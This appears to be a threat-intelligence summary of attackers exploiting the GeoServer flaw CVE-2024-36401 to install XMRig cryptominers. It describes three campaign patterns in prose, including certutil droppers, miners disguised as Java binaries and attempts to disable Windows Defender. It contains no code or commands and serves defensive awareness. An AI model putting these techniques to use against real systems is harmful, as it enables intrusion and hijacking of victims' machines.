The activity centers on CVE-2024-36401, a remote code execution vulnerability disclosed in 2024 that allows unauthenticated attackers to execute arbitrary commands on vulnerable GeoServer instances. Since disclosure, multiple threat actors have systematically scanned for exposed and unpatched GeoServer deployments, abusing the vulnerability to execute PowerShell, Bash, and Windows-native utilities (such as certutil) to fetch and run malware.
Three distinct CoinMiner infection patterns were observed by researchers. Type A campaigns leveraged PowerShell and Bash payloads to download batch or shell scripts that ultimately installed XMRig, reusing Monero wallet addresses across both GeoServer and other exposed services such as WegLogic. Type B activity involved a more structured dropper delivered via certutil, unpacking a RAR SFX archive that installed a customized XMRig build disguised as Java binaries and executed as a Windows service via NSSM. Type C campaigns combined CoinMiner deployment with additional tooling, including AnyDesk and a custom in-memory downloader, while also attempting to disable or bypass Windows Defender to maintain long-term access.